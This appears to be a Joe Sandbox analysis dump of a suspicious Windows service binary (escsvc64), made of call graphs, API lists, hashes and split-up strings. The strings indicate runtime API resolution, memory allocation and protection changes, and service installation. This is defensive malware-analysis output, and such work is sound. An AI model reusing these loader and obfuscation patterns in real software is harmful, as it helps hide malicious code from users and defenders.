18843->18686 18844 140001158 18844->18830 18847->18843 18848->18830 18848->18834 18848->18844 18878 140005e60 18849->18878 18851 14000717b _initp_misc_winsig 18852 1400071ae KiUserExceptionDispatcher 18851->18852 18888 14000ca70 18852->18888 18858 140007624 18857->18858 18859 140007634 VirtualAlloc 18858->18859 18860 140007663 VirtualFree 18859->18860 18860->18724 18863 1400076b4 VirtualFree 18862->18863 18863->18737 18866 140008a70 18865->18866 18868 140008a8e Sleep 18866->18868 18869 1400064dc 18866->18869 18950 140007290 18866->18950 18868->18866 18868->18869 18869->18735 18869->18736 18871 140006070 18870->18871 18877 1400060fe __initmbctable 18870->18877 18872 140006ed0 __initmbctable 19 API calls 18871->18872 18873 140006080 18872->18873 18874 140006087 GetModuleHandleA 18873->18874 18875 1400060ce GetProcAddress GetProcAddress 18873->18875 18874->18875 18876 1400060a7 18874->18876 18875->18877 18876->18875 18876->18877 18877->18744 18879 140005e91 GetModuleHandleA 18878->18879 18880 140005e7a FlsGetValue 18878->18880 18881 140005e85 18879->18881 18882 140005eaa 18879->18882 18880->18879 18880->18881 18881->18851 18901 140006ed0 18882->18901 18884 140005ebc 18885 140005ec3 GetModuleHandleA 18884->18885 18886 140005f0e GetProcAddress 18884->18886 18885->18886 18887 140005ee5 18885->18887 18886->18881 18887->18881 18887->18886 18889 140005d90 27 API calls 18888->18889 18890 1400071be 18889->18890 18891 140005d90 18890->18891 18892 140005dc4 GetModuleHandleA 18891->18892 18893 140005db0 FlsGetValue 18891->18893 18894 140005dbb 18892->18894 18895 140005dd9 18892->18895 18893->18892 18893->18894 18894->18722 18896 140006ed0 __initmbctable 23 API calls 18895->18896 18897 140005de9 18896->18897 18898 140005e2e GetProcAddress 18897->18898 18899 140005df0 GetModuleHandleA 18897->18899 18898->18894 18899->18898 18900 140005e10 18899->18900 18900->18894 18900->18898 18902 140006ed9 18901->18902 18904 140006f0f 18902->18904 18908 140004c40 18902->18908 18904->18884 18920 1400061b0 GetLastError FlsGetValue 18908->18920 18910 140004c49 18911 140004ae0 18910->18911 18938 140005f50 18911->18938 18913 140004b0f __initmbctable 18914 140004b14 18913->18914 18915 140004b3e RtlCaptureContext 18913->18915 18914->18884 18948 14000a2c0 18915->18948 18917 140004b5e IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18918 140004bb5 GetCurrentProcess TerminateProcess 18917->18918 18919 140004ba9 __initmbctable 18917->18919 18918->18914 18919->18918 18921 140006221 SetLastError 18920->18921 18922 1400061d6 18920->18922 18921->18910 18923 140008a40 __initmbctable 18 API calls 18922->18923 18924 1400061e3 18923->18924 18924->18921 18925 1400061eb FlsSetValue 18924->18925 18926 140006201 18925->18926 18927 14000621a 18925->18927 18928 140006020 __initmbctable 18 API calls 18926->18928 18932 140004d30 18927->18932 18930 140006208 GetCurrentThreadId 18928->18930 18930->18921 18931 14000621f 18931->18921 18933 140004d39 HeapFree 18932->18933 18934 140004d69 __initmbctable 18932->18934 18933->18934 18935 140004d4f 18933->18935 18934->18931 18936 140004c40 __initmbctable 21 API calls 18935->18936 18937 140004d59 GetLastError 18936->18937 18937->18934 18939 140005f84 GetModuleHandleA 18938->18939 18940 140005f70 FlsGetValue 18938->18940 18941 140005f99 18939->18941 18942 140005f7b 18939->18942 18940->18939 18940->18942 18943 140006ed0 __initmbctable 19 API calls 18941->18943 18942->18913 18944 140005fa9 18943->18944 18945 140005fee GetProcAddress 18944->18945 18946 140005fb0 GetModuleHandleA 18944->18946 18945->18942 18946->18945 18947 140005fd0 18946->18947 18947->18942 18947->18945 18949 14000a2c9 18948->18949 18949->18917 18949->18949 18951 1400072a5 18950->18951 18953 1400072e6 18950->18953 18952 1400072b6 18951->18952 18951->18953 18955 140004c40 __initmbctable 22 API calls 18952->18955 18954 1400072fe HeapAlloc 18953->18954 18960 14000732b 18953->18960 18961 140003750 18953->18961 18954->18953 18954->18960 18956 1400072bb 18955->18956 18958 140004ae0 __initmbctable 22 API calls 18956->18958 18959 1400072d9 18958->18959 18959->18866 18960->18866 18962 140005f50 __initmbctable 23 API calls 18961->18962 18963 140003765 18962->18963 18963->18953 18965 140005f50 __initmbctable 23 API calls 18964->18965 18966 14000cdec 18965->18966 18967 14000ce68 18966->18967 18976 140006e80 18966->18976 18967->18754 18969 14000cdfe 18970 14000ce16 18969->18970 18983 140004a40 RtlCaptureContext 18969->18983 18972 14000ce26 GetModuleHandleA 18970->18972 18973 14000ce1d 18970->18973 18972->18973 18974 14000ce38 GetProcAddress 18972->18974 18975 140005d90 27 API calls 18973->18975 18974->18973 18975->18967 18977 140006e89 18976->18977 18978 140004c40 __initmbctable 23 API calls 18977->18978 18979 140006ec0 18977->18979 18980 140006e8e 18978->18980 18979->18969 18981 140004ae0 __initmbctable 23 API calls 18980->18981 18982 140006eac 18981->18982 18982->18969 18984 14000a2c0 __initmbctable 18983->18984 18985 140004a69 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18984->18985 18986 140004ab4 __initmbctable 18985->18986 18987 140004ac0 GetCurrentProcess TerminateProcess 18985->18987 18986->18987 18987->18970 18989 1400089f0 18988->18989 18991 140006c49 18989->18991 18992 140008a08 Sleep 18989->18992 18993 140003790 18989->18993 18991->18798 18991->18799 18992->18989 18992->18991 18994 14000383e 18993->18994 18999 1400037a3 __initmbctable 18993->18999 18995 140003750 __initmbctable 23 API calls 18994->18995 18996 140003843 18995->18996 18998 140004c40 __initmbctable 23 API calls 18996->18998 18997 1400037ec HeapAlloc 18997->18999 19007 140003825 18997->19007 19000 140003848 18998->19000 18999->18997 19001 140003815 18999->19001 19002 140003750 __initmbctable 23 API calls 18999->19002 19004 140003813 18999->19004 19005 140006de0 __initmbctable 3 API calls 18999->19005 19000->18989 19003 140004c40 __initmbctable 23 API calls 19001->19003 19002->18999 19003->19004 19006 140004c40 __initmbctable 23 API calls 19004->19006 19005->18999 19006->19007 19007->18989 19009 1400071f6 19008->19009 19010 1400071ec 19008->19010 19011 140004c40 __initmbctable 23 API calls 19009->19011 19010->19009 19012 140007230 19010->19012 19013 1400071ff 19011->19013 19015 140007281 19012->19015 19017 140004c40 __initmbctable 23 API calls 19012->19017 19014 140004ae0 __initmbctable 23 API calls 19013->19014 19016 14000721d 19014->19016 19015->18820 19016->18820 19018 140007259 19017->19018 19019 140004ae0 __initmbctable 23 API calls 19018->19019 19020 140007277 19019->19020 19020->18820 19022 140009e26 19021->19022 19023 140005d90 27 API calls 19022->19023 19024 140006f53 19022->19024 19023->19022 19024->18827 19025 140003720 19024->19025 19028 1400035f0 19025->19028 19027 140003729 19027->18827 19029 140003611 19028->19029 19030 140005f50 __initmbctable 23 API calls 19029->19030 19031 14000361e 19030->19031 19032 140005f50 __initmbctable 23 API calls 19031->19032 19033 14000362d 19032->19033 19036 1400036ae 19033->19036 19046 140008c00 19033->19046 19036->19027 19037 140005d90 27 API calls 19039 1400036ba 19037->19039 19038 140003679 19038->19036 19042 140008ad0 27 API calls 19038->19042 19043 140003690 19038->19043 19041 140005d90 27 API calls 19039->19041 19041->19036 19042->19043 19043->19036 19044 140005d90 27 API calls 19043->19044 19045 1400036a5 19044->19045 19045->19037 19047 140008c35 HeapSize 19046->19047 19048 140008c09 19046->19048 19049 140004c40 __initmbctable 23 API calls 19048->19049 19050 140008c0e 19049->19050 19051 140004ae0 __initmbctable 23 API calls 19050->19051 19052 140003655 19051->19052 19052->19038 19052->19045 19053 140008ad0 19052->19053 19055 140008b00 19053->19055 19056 140008b20 Sleep 19055->19056 19057 140008b42 19055->19057 19058 14000d220 19055->19058 19056->19055 19056->19057 19057->19038 19059 14000d235 19058->19059 19060 14000d24c 19059->19060 19072 14000d25e 19059->19072 19061 140004d30 __initmbctable 23 API calls 19060->19061 19063 14000d251 19061->19063 19062 14000d2b1 19065 140003750 __initmbctable 23 API calls 19062->19065 19063->19055 19064 14000d273 HeapReAlloc 19064->19072 19076 14000d2be __initmbctable 19064->19076 19066 14000d2b9 19065->19066 19067 140004c40 __initmbctable 23 API calls 19066->19067 19067->19076 19068 14000d2f4 19069 140004c40 __initmbctable 23 API calls 19068->19069 19071 14000d2f9 GetLastError 19069->19071 19070 140003750 __initmbctable 23 API calls 19070->19072 19071->19076 19072->19062 19072->19064 19072->19068 19072->19070 19073 14000d2db 19072->19073 19074 140004c40 __initmbctable 23 API calls 19073->19074 19075 14000d2e0 GetLastError 19074->19075 19075->19076 19076->19055 19078 140001654 OpenSCManagerW 19077->19078 19079 1400016e5 19077->19079 19078->19079 19080 140001674 CreateServiceW 19078->19080 19107 140002be0 19079->19107 19082 1400016d3 CloseServiceHandle 19080->19082 19083 1400016dc CloseServiceHandle 19080->19083 19082->19083 19083->19079 19084 1400011a1 19084->18686 19086 140001732 OpenServiceW 19085->19086 19087 1400011b4 19085->19087 19088 14000186c CloseServiceHandle 19086->19088 19089 14000175c StartServiceW 19086->19089 19087->18686 19088->19087 19089->19087 19090 140001772 QueryServiceStatusEx 19089->19090 19090->19087 19091 14000179d GetTickCount 19090->19091 19092 14000184f CloseServiceHandle 19091->19092 19094 1400017c1 19091->19094 19092->19087 19092->19088 19093 1400017f2 Sleep QueryServiceStatusEx 19093->19094 19095 14000184a 19093->19095 19094->19093 19094->19095 19096 140001835 GetTickCount 19094->19096 19097 140001827 GetTickCount 19094->19097 19095->19092 19096->19094 19096->19095 19097->19094 19099 1400018b2 OpenServiceW 19098->19099 19100 1400011c7 19098->19100 19101 1400018d5 ControlService 19099->19101 19102 14000194a CloseServiceHandle 19099->19102 19100->18686 19103 140001938 DeleteService CloseServiceHandle 19101->19103 19104 1400018ee Sleep QueryServiceStatus 19101->19104 19102->19100 19103->19102 19104->19103 19105 14000190d 19104->19105 19105->19103 19106 140001919 Sleep QueryServiceStatus 19105->19106 19106->19103 19106->19105 19108 140002be9 19107->19108 19109 140002bf4 19108->19109 19110 140004d80 RtlCaptureContext RtlLookupFunctionEntry 19108->19110 19109->19084 19111 140004dc4 RtlVirtualUnwind 19110->19111 19112 140004e05 19110->19112 19113 140004e27 IsDebuggerPresent 19111->19113 19112->19113 19118 14000a2a0 19113->19118 19115 140004e86 SetUnhandledExceptionFilter UnhandledExceptionFilter 19116 140004ea4 __initmbctable 19115->19116 19117 140004eae GetCurrentProcess TerminateProcess 19115->19117 19116->19117 19117->19084 19118->19115
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd
            Similarity
            • API ID: Virtual$AllocFunctionInfoLibraryLoadNativeProtectSleepSystemTable
            • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$onTa$p$rote$temI$tion$truc$ualA$ualP
            • API String ID: 1082286156-924545899
            • Opcode ID: ba67eb782131c3f065ce6fb0f8a316021b757953efe746a7c66d5e51c776329b
            • Instruction ID: 4b877a474c9715c2d276260203bc0ad77e6aa320a981a279a42016251bc6a765
            • Opcode Fuzzy Hash: ba67eb782131c3f065ce6fb0f8a316021b757953efe746a7c66d5e51c776329b
            • Instruction Fuzzy Hash: 38620D74614B098FD719DF18C8856BAB7E1FB94305F14462EDC8BC7216DB38E846CB8A

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 167 1400032a0-1400032df GetStartupInfoW GetProcessHeap HeapAlloc 168 1400032e1-1400032e8 167->168 169 14000330d-14000331e GetVersionExA 167->169 170 1400032ea call 140007b80 168->170 171 1400032ef-140003308 call 140007940 call 140006de0 168->171 172 14000333e-14000336a GetProcessHeap HeapFree 169->172 173 140003320-140003339 GetProcessHeap HeapFree 169->173 170->171 176 14000353b-140003553 171->176 177 14000336c 172->177 178 140003370-1400033a1 172->178 173->176 177->178 180 140003402-14000340b 178->180 181 1400033a3-1400033ba 178->181 182 140003412-14000341e call 140008800 180->182 184 1400033c7-1400033cd 181->184 185 1400033bc-1400033c5 181->185 193 140003442 call 140006450 182->193 194 140003420-140003427 182->194 186 1400033da-1400033e1 184->186 187 1400033cf-1400033d8 184->187 185->182 190 1400033e3-1400033ec 186->190 191 1400033ee-140003400 186->191 187->182 190->182 191->182 198 140003447-140003449 193->198 196 140003429 call 140007b80 194->196 197 14000342e-14000343d call 140007940 call 140006de0 194->197 196->197 197->193 201 14000344b-140003452 198->201 202 14000346d-14000347a call 140008780 call 140008440 198->202 204 140003454 call 140007b80 201->204 205 140003459-140003468 call 140007940 call 140006de0 201->205 215 140003486-1400034a5 call 140008320 call 140006bb0 call 1400080b0 202->215 216 14000347c-140003481 call 140006db0 202->216 204->205 205->202 224 1400034b1-1400034b8 call 140006a40 215->224 225 1400034a7-1400034ac call 140006db0 215->225 216->215 229 1400034c4-1400034d0 call 140006f20 224->229 230 1400034ba-1400034bf call 140006db0 224->230 225->224 234 1400034d2-1400034d4 call 140006db0 229->234 235 1400034d9-1400034e3 call 140007e90 229->235 230->229 234->235 239 1400034e5-1400034eb 235->239 240 1400034ed 235->240 241 1400034f3-140003508 call 140001080 239->241 240->241 244 140003511-140003534 call 140007150 241->244 245 14000350a-14000350c call 140007130 241->245 244->176 245->244
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: Heap$Process$Free$AllocInfoStartupVersion
            • String ID:
            • API String ID: 3103264659-0
            • Opcode ID: 08338c099bac06f54d88c59f1c918d076a1e8d62e458aef75d7556fa01c796ee
            • Instruction ID: ff0c295640f5b83f1606a13dac472acdbcc50a6aea1cbc63b0c003526a08d6e8
            • Opcode Fuzzy Hash: 08338c099bac06f54d88c59f1c918d076a1e8d62e458aef75d7556fa01c796ee
            • Instruction Fuzzy Hash: 1C717AB1A0064186F7A7EB73B8517EA2299BB8C7C4F044039FB458B2F2EF798941C741

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 279 140007450-140007555 281 140007559-14000755c 279->281 282 14000755e-14000756b 281->282 283 1400075af 281->283 285 1400075a4-1400075a7 282->285 286 14000756d 282->286 284 1400075b2-1400076b2 call 140007458 * 6 VirtualAlloc 283->284 304 1400076d4-1400076fa VirtualFree 284->304 305 1400076b4-1400076b9 284->305 285->281 287 140007570-140007594 286->287 287->287 289 140007596-1400075a2 287->289 289->285 291 1400075a9-1400075ad 289->291 291->284 306 1400076bc-1400076d2 305->306 306->304 306->306
            APIs
            • VirtualAlloc.KERNELBASE(000000014000645E,?,?,?,?,0000000140003447), ref: 000000014000764F
            • VirtualFree.KERNELBASE(?,?,?,?,0000000140003447), ref: 00000001400076E1
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: Virtual$AllocFree
            • String ID: l$ntdl
            • API String ID: 2087232378-924918826
            • Opcode ID: 0e4d7604a2b929d53cc1f1856375e7947663ec15530bb6538b89027d8cfb31b4
            • Instruction ID: 082983da74dfe290379792d1b3382f9732f054a55705ee5756d289afdac720fd
            • Opcode Fuzzy Hash: 0e4d7604a2b929d53cc1f1856375e7947663ec15530bb6538b89027d8cfb31b4
            • Instruction Fuzzy Hash: E94128A27106E48ADB15CF2BA840BDD2B55E75AFC0F449016FF4E1BB56CA3CC542C710

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 340 180001c10-180001c26 341 180001c57-180001c6d call 180001f40 340->341 342 180001c28-180001c51 StartServiceCtrlDispatcherW 340->342 342->341
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd
            Similarity
            • API ID: CtrlDispatcherServiceStart
            • String ID:
            • API String ID: 3789849863-0
            • Opcode ID: 43184d67f14c20715f7b26f6198189ae43bf3b66bb01ad773179d3671ebbb7a0
            • Instruction ID: b313e6faf4b91d82712c3ff4ec49ed76d19982d5675628aa87cac0bd1d38dc2e
            • Opcode Fuzzy Hash: 43184d67f14c20715f7b26f6198189ae43bf3b66bb01ad773179d3671ebbb7a0
            • Instruction Fuzzy Hash: DDF0DA31518E4C8FE781EF28C4997DA77E5F798311F818A2AF449C3250EF38D6848B42
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000003.1714556876.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_3_1f0000_escsvc64.jbxd
            Similarity
            • API ID: realloc
            • String ID: $($0$4$5$6$G$M$T$a$i$l$u$z
            • API String ID: 471065373-2079474088
            • Opcode ID: 7d012af2536f1f7d995bb6865e94ab2d39a3359b1312110b88a70488074df788
            • Instruction ID: 7ec3f774127c4727641ba4316498a8866575b2c65707d6e0a378af2f91f2380d
            • Opcode Fuzzy Hash: 7d012af2536f1f7d995bb6865e94ab2d39a3359b1312110b88a70488074df788
            • Instruction Fuzzy Hash: FBC1597061860C8FDF19DF64D8986EEBBE1FB98305F04412DE98ADB242DF70994ACB45
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000003.1714556876.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_3_1f0000_escsvc64.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID: dll$l)$~$msvcrt.dll$ttp.$user32.dll$winh
            • API String ID: 1029625771-1052611218
            • Opcode ID: f96e166d31e0664f72b86a40ea9ed61905039d2648656030012699a26d18f6a5
            • Instruction ID: 2ac9a726799ac48c0a130d3513529ae525e5b576e82550c3c3b86dc13fe0d0db
            • Opcode Fuzzy Hash: f96e166d31e0664f72b86a40ea9ed61905039d2648656030012699a26d18f6a5
            • Instruction Fuzzy Hash: 3791BCB0910B4C8FC791EFB4845939BBAE1FF5C380F608A19A19DD7726DF3998418B85

            Control-flow Graph

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: Free$AllocVirtual$CurrentDispatcherExceptionThreadUserValue_initp_misc_winsig
            • String ID:
            • API String ID: 158422070-0
            • Opcode ID: 9195a0cd0be8c3569a83707636c05d213fc4554a45bd247ded46233fca8e8480
            • Instruction ID: cce0763aefef4587a24946a9f4ca3712f20a1716bcb15b54cc0025836c1ee2c2
            • Opcode Fuzzy Hash: 9195a0cd0be8c3569a83707636c05d213fc4554a45bd247ded46233fca8e8480
            • Instruction Fuzzy Hash: C431ECB0600A018AE65AEB7BB8583D93292AB4D7F5F980318F7765F2F1DF7D84468610
            APIs
            Memory Dump Source
            • Source File: 00000000.00000003.1714556876.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_3_1f0000_escsvc64.jbxd
            Similarity
            • API ID: AllocCreateThreadVirtual
            • String ID:
            • API String ID: 3065189322-0
            • Opcode ID: 37883c71a4e1d3b3c6981b9ed2e9e665bf046d071fdbf6d9a47d73c2f0244c8d
            • Instruction ID: 13a11b2a975c384cb44c94f81c102f8a731fe8fbc20b8a548073b4f0e84c3545
            • Opcode Fuzzy Hash: 37883c71a4e1d3b3c6981b9ed2e9e665bf046d071fdbf6d9a47d73c2f0244c8d
            • Instruction Fuzzy Hash: 94414570608608CFCF58EF18C4887AD7BE2FB48758F00412DAD0EEB256DBB58958CB84

            Control-flow Graph

            APIs
              • Part of subcall function 0000000140005E60: FlsGetValue.KERNEL32(?,?,?,000000014000717B,?,?,00000000,0000000140006459,?,?,?,?,0000000140003447), ref: 0000000140005E7A
            • _initp_misc_winsig.LIBCMT ref: 00000001400071A9
            • KiUserExceptionDispatcher.NTDLL ref: 00000001400071B1
              • Part of subcall function 0000000140005D90: FlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000D595,?,?,?,000000014000970C), ref: 0000000140005DB0
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: Value$DispatcherExceptionUser_initp_misc_winsig
            • String ID:
            • API String ID: 3398106669-0
            • Opcode ID: 2579abccdfdfa1ca2409a143a2b4d5cf1ae2fe72868da0f7081bba654f418bec
            • Instruction ID: e400128bdf60cb768f5461161da783887e2f7fea914d3257c31e6f2653dd6cfd
            • Opcode Fuzzy Hash: 2579abccdfdfa1ca2409a143a2b4d5cf1ae2fe72868da0f7081bba654f418bec
            • Instruction Fuzzy Hash: 2BF0AEF06A620640E90AFB637826BEA03808B8FBC1F4820317B0B0B2B39D3880404380

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 327 140008800-140008822 HeapCreate 328 140008824-140008828 327->328 329 140008829-140008850 HeapSetInformation 327->329
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: Heap$CreateInformation
            • String ID:
            • API String ID: 1774340351-0
            • Opcode ID: 2f3b07a5057123e73a3f5e291b1c4a5b22797b276520671a3e4f3cb1187edd10
            • Instruction ID: ce64bbf01f416f0299a489085bfe71602f84ad1ff6a2fcf5659d02faa047aa91
            • Opcode Fuzzy Hash: 2f3b07a5057123e73a3f5e291b1c4a5b22797b276520671a3e4f3cb1187edd10
            • Instruction Fuzzy Hash: 9CE048B5B1265082F7995B12AC49B9D6660F79C780F809019FB4D43764DF7DC1454B00

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 330 140007610-14000761c 331 140007624-1400076b2 call 140007458 VirtualAlloc 330->331 332 14000761f call 140007458 330->332 336 1400076d4-1400076fa VirtualFree 331->336 337 1400076b4-1400076b9 331->337 332->331 338 1400076bc-1400076d2 337->338 338->336 338->338
            APIs
            • VirtualAlloc.KERNELBASE(000000014000645E,?,?,?,?,0000000140003447), ref: 000000014000764F
            • VirtualFree.KERNELBASE(?,?,?,?,0000000140003447), ref: 00000001400076E1
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: Virtual$AllocFree
            • String ID:
            • API String ID: 2087232378-0
            • Opcode ID: 89dea25f0bcc4f905972bf8608fe8dcd6de5403fdbd72f1580a36dc66a60dc05
            • Instruction ID: f65805860dc40e2b983aaf0f666c5c3de04cc8ec45c5f093d04358e3227d39e4
            • Opcode Fuzzy Hash: 89dea25f0bcc4f905972bf8608fe8dcd6de5403fdbd72f1580a36dc66a60dc05
            • Instruction Fuzzy Hash: A121F3637156E88BCF46CF2BA88469E2F15D75ABC4B04906AEE4E17B1AC938D186C710

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 345 18000bbc0-18000bbef VirtualProtect
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID:
            • API String ID: 544645111-0
            • Opcode ID: a1bfea3291010e4e8c9c942faa318457b8d813102347f83538f3b7a194bc6733
            • Instruction ID: 2f1e772e7f36b6363628d8cc3ae21d80d83d642b4dc8e669f90c229daf89f17f
            • Opcode Fuzzy Hash: a1bfea3291010e4e8c9c942faa318457b8d813102347f83538f3b7a194bc6733
            • Instruction Fuzzy Hash: 9BD0A73012160087E3089720EC857D6B294F788305F80011CF846C1180DB2C86D4C642

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 346 1400076b0-1400076b2 347 1400076d4-1400076fa VirtualFree 346->347 348 1400076b4-1400076b9 346->348 349 1400076bc-1400076d2 348->349 349->347 349->349
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: FreeVirtual
            • String ID:
            • API String ID: 1263568516-0
            • Opcode ID: 645e027d282d799c43ef8747a086244cde8df3e933449bd1787ac8c2826f5191
            • Instruction ID: 79d5dedfb32e33f50797cdffc4c50002341004bd1cd21fd5edceff188308d5b8
            • Opcode Fuzzy Hash: 645e027d282d799c43ef8747a086244cde8df3e933449bd1787ac8c2826f5191
            • Instruction Fuzzy Hash: 0AE0D8B3F145A801EB03CB2BE80076A1B40D389BE4F044012CE5A07B55C93DD8C3C724

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 351 140001c90-140001cf3 call 14000a2c0 call 140001000 356 140001cf9-140001d25 RegOpenKeyExW 351->356 357 140001d80-140001db4 lstrlenW 351->357 358 140001d71-140001d77 356->358 359 140001d27-140001d6b RegQueryValueExW RegCloseKey 356->359 360 140001dba-140001dcc 357->360 361 140001ecf-140001edf lstrlenW 357->361 358->357 365 140001d79-140001d7b 358->365 359->358 362 140001dd0-140001dda 360->362 363 140002052 361->363 364 140001ee5-140001f0e call 14000a2c0 361->364 366 140001df5-140001df8 362->366 367 140001ddc-140001de4 362->367 369 140002054-140002064 363->369 377 140001f10-140001f1a 364->377 370 14000206c-140002074 365->370 373 140001dfa 366->373 374 140001dfe-140001e2b RegOpenKeyExW 366->374 367->366 371 140001de6-140001df1 367->371 369->370 375 140002077 call 140002be0 370->375 371->362 376 140001df3 371->376 373->374 378 140001e31-140001e6a RegQueryValueExW 374->378 379 140002087-140002089 374->379 380 14000207c-140002086 375->380 376->373 381 140001f34-140001f37 377->381 382 140001f1c-140001f23 377->382 383 140001ebc-140001ec9 RegCloseKey 378->383 384 140001e6c-140001e7d 